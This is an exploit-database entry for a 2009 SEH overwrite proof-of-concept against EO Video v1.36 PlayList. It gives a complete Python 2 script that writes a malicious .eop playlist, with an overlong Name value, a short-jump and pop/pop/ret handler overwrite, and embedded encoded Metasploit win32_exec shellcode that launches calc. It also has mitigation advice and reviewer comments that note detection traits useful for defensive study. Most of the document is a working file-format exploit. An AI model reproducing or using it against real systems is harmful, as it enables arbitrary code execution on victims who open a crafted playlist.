vendor:
EO Video Playlist
by:
j0rgan
7.8
CVSS
HIGH
Seh Overwrite Exploit
119
CWE
Product Name: EO Video Playlist
Affected Version From: EO Video v1.36 PlayList
Affected Version To: EO Video v1.36 PlayList
Patch Exists: Yes
Related CWE: N/A
CPE: a:eo_software:eo_video_playlist
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2 (Fr)
2009

EO Video v1.36 PlayList Seh Overwrite Exploit

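This proof-of-concept targets EO Video v1.36 PlayList. It is an SEH overwrite exploit: the script writes a playlist file (exploit.eop) whose <Name> value inside a <ProjectElement> is over-long, so that opening the file overwrites the structured exception handler (SEH) record and lets code carried in the file run. The payload bundled with the script is labelled by its author as a Metasploit win32_exec payload with CMD=calc. It was discovered by j0rgan and tested on Windows XP SP2 (Fr). It is written in Python (Python 2 syntax).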

Mitigation:

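Update EO Video to a release newer than the affected v1.36 PlayList; this page records that a patch exists but does not name the fixed version. Until the update is applied, do not open .eop playlist files from untrusted sources.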

Exploit-DB raw data:

#!/usr/bin/python
#usage: exploit.py
# Banner: prints the PoC title, credits and tested platform to stdout. It has
# no effect on the file the script generates.
# NOTE(review): these are Python 2 print statements, so the script as
# published does not parse under Python 3.
print "**************************************************************************"
print "[*] EO Video v1.36 PlayList Seh Overwrite Exploit\n"
print "[*] Author: j0rgan"
print "[*] Seh Exploitation : His0k4"
print "[*] Tested on: Windows XP SP2 (Fr)\n"
print "[*] Greetings to: All friends & Muslims HacKerS (DZ)"
print "**************************************************************************"

# Filler: 1356 bytes of 0x41 ('A'). In the final concatenation this comes
# first inside the open <Name> tag, ahead of the two 4-byte fields below.
# NOTE(review): 1356 is presumably the distance to the SEH record in the
# tested build; the script hard-codes it rather than deriving it.
buff = "\x41" * 1356

# Four bytes that land on the "next SEH" pointer of the overwritten record.
# 0xEB 0x06 is the x86 encoding of a short jump forward by 6 bytes; the two
# 0x41 bytes are padding.
next_seh = "\xEB\x06\x41\x41"

# Four bytes that land on the handler pointer: little-endian 0x585B1E14,
# which the author labels as a pop/pop/ret sequence in msgsm32.acm.
# NOTE(review): a hard-coded module address ties this PoC to the platform in
# the banner (Windows XP SP2 Fr); behaviour elsewhere is not verified here.
seh = "\x14\x1E\x5B\x58" #pop pop ret msgsm32 .acm

# Opening part of the .eop playlist, written as hex escapes. Decoded, it is
# plain XML text:
#   <EOPlaylist>\n<Playlist>\n<FolderList>\n
#   <Folder>\n<Name>nesto</Name>\n<TrueFrequency>1</TrueFrequency>\n</Folder>\n   (twice)
#   </FolderList>\n<ProjectElement>\n<Name>
# It stops on an open <Name> tag, so whatever is concatenated next becomes
# the ProjectElement name.
# NOTE(review): for detection, a <ProjectElement><Name> value that is over a
# kilobyte long and contains non-printable bytes is the distinguishing trait
# of this file; presumably legitimate names are short text — confirm against
# real playlists.
header1= (																		
	"\x3C\x45\x4F\x50\x6C\x61\x79\x6C\x69\x73\x74\x3E\x0A\x3C\x50\x6C\x61\x79\x6C"
	"\x69\x73\x74\x3E\x0A\x3C\x46\x6F\x6C\x64\x65\x72\x4C\x69\x73\x74\x3E\x0A\x3C"
	"\x46\x6F\x6C\x64\x65\x72\x3E\x0A\x3C\x4E\x61\x6D\x65\x3E\x6E\x65\x73\x74\x6F"
	"\x3C\x2F\x4E\x61\x6D\x65\x3E\x0A\x3C\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65"
	"\x6E\x63\x79\x3E\x31\x3C\x2F\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65\x6E\x63"
	"\x79\x3E\x0A\x3C\x2F\x46\x6F\x6C\x64\x65\x72\x3E\x0A\x3C\x46\x6F\x6C\x64\x65"
	"\x72\x3E\x0A\x3C\x4E\x61\x6D\x65\x3E\x6E\x65\x73\x74\x6F\x3C\x2F\x4E\x61\x6D"
	"\x65\x3E\x0A\x3C\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65\x6E\x63\x79\x3E\x31"
	"\x3C\x2F\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65\x6E\x63\x79\x3E\x0A\x3C\x2F"
	"\x46\x6F\x6C\x64\x65\x72\x3E\x0A\x3C\x2F\x46\x6F\x6C\x64\x65\x72\x4C\x69\x73"
	"\x74\x3E\x0A\x3C\x50\x72\x6F\x6A\x65\x63\x74\x45\x6C\x65\x6D\x65\x6E\x74\x3E"
	"\x0A\x3C\x4E\x61\x6D\x65\x3E")
	
# Closing part of the .eop playlist, written as hex escapes. Decoded:
#   </Name>\n<StartTime>0</StartTime>\n<EndTime>0</EndTime>\n
#   <MediaSize>\n<Width>-1</Width>\n<Height>-1</Height>\n</MediaSize>\n
#   <State>30216</State>\n<FolderPositionIndex>0</FolderPositionIndex>\n
#   </ProjectElement>\n</Playlist>
# followed by the two bytes 0x5C 0x6E and then </EOPlaylist>.
# NOTE(review): 0x5C 0x6E is a literal backslash and the letter 'n', not the
# 0x0A newline used everywhere else. It looks like an artefact of how the
# template was produced and can serve as a fingerprint for files generated
# by this exact script.
header2= (
	"\x3C\x2F\x4E\x61\x6D\x65\x3E\x0A\x3C\x53\x74\x61\x72\x74\x54\x69\x6D\x65\x3E"
	"\x30\x3C\x2F\x53\x74\x61\x72\x74\x54\x69\x6D\x65\x3E\x0A\x3C\x45\x6E\x64\x54"
	"\x69\x6D\x65\x3E\x30\x3C\x2F\x45\x6E\x64\x54\x69\x6D\x65\x3E\x0A\x3C\x4D\x65"
	"\x64\x69\x61\x53\x69\x7A\x65\x3E\x0A\x3C\x57\x69\x64\x74\x68\x3E\x2D\x31\x3C"
	"\x2F\x57\x69\x64\x74\x68\x3E\x0A\x3C\x48\x65\x69\x67\x68\x74\x3E\x2D\x31\x3C"
	"\x2F\x48\x65\x69\x67\x68\x74\x3E\x0A\x3C\x2F\x4D\x65\x64\x69\x61\x53\x69\x7A"
	"\x65\x3E\x0A\x3C\x53\x74\x61\x74\x65\x3E\x33\x30\x32\x31\x36\x3C\x2F\x53\x74"
	"\x61\x74\x65\x3E\x0A\x3C\x46\x6F\x6C\x64\x65\x72\x50\x6F\x73\x69\x74\x69\x6F"
	"\x6E\x49\x6E\x64\x65\x78\x3E\x30\x3C\x2F\x46\x6F\x6C\x64\x65\x72\x50\x6F\x73"
	"\x69\x74\x69\x6F\x6E\x49\x6E\x64\x65\x78\x3E\x0A\x3C\x2F\x50\x72\x6F\x6A\x65"
	"\x63\x74\x45\x6C\x65\x6D\x65\x6E\x74\x3E\x0A\x3C\x2F\x50\x6C\x61\x79\x6C\x69"
	"\x73\x74\x3E\x5C\x6E\x3C\x2F\x45\x4F\x50\x6C\x61\x79\x6C\x69\x73\x74\x3E")
	

# Payload bytes, concatenated directly after the overwritten handler pointer.
# The generator line below identifies this as a Metasploit win32_exec payload
# with CMD=calc, i.e. a proof-of-concept action (launching the Windows
# calculator) rather than anything destructive.
# The literal is 10 rows of 16 bytes = 160 bytes, matching "Size=160".
# NOTE(review): the bytes are encoded (PexFnstenvSub per the generator line)
# and were not decoded for this review; treat them as untrusted and handle
# the generated file only in an isolated analysis environment.
# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
	"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x35"
	"\x9c\xf7\xbc\x83\xeb\xfc\xe2\xf4\xc9\x74\xb3\xbc\x35\x9c\x7c\xf9"
	"\x09\x17\x8b\xb9\x4d\x9d\x18\x37\x7a\x84\x7c\xe3\x15\x9d\x1c\xf5"
	"\xbe\xa8\x7c\xbd\xdb\xad\x37\x25\x99\x18\x37\xc8\x32\x5d\x3d\xb1"
	"\x34\x5e\x1c\x48\x0e\xc8\xd3\xb8\x40\x79\x7c\xe3\x11\x9d\x1c\xda"
	"\xbe\x90\xbc\x37\x6a\x80\xf6\x57\xbe\x80\x7c\xbd\xde\x15\xab\x98"
	"\x31\x5f\xc6\x7c\x51\x17\xb7\x8c\xb0\x5c\x8f\xb0\xbe\xdc\xfb\x37"
	"\x45\x80\x5a\x37\x5d\x94\x1c\xb5\xbe\x1c\x47\xbc\x35\x9c\x7c\xd4"
	"\x09\xc3\xc6\x4a\x55\xca\x7e\x44\xb6\x5c\x8c\xec\x5d\x6c\x7d\xb8"
	"\x6a\xf4\x6f\x42\xbf\x92\xa0\x43\xd2\xff\x96\xd0\x56\x9c\xf7\xbc"
    )

# Final file layout, in order: XML up to the open <Name> tag, the 1356 filler
# bytes, the two 4-byte SEH-record fields, the payload, then the closing XML.
# Everything between header1 and header2 therefore sits inside one <Name>
# element of the playlist.
exploit = header1 + buff + next_seh + seh + shellcode + header2

# Write the playlist to "exploit.eop" in the current working directory.
# Running the script only creates this file; per the success message, nothing
# is triggered until the file is opened in the player.
# NOTE(review): the bare `except:` hides the actual failure (permissions,
# disk full, ...) behind a generic "Error", and the handle is not closed if
# write() raises.
try:
    out_file = open("exploit.eop",'w')
    out_file.write(exploit)
    out_file.close()
    print "Exploit File Created!\nNow Open it :)"
except:
    print "Error"

# milw0rm.com [2009-03-09]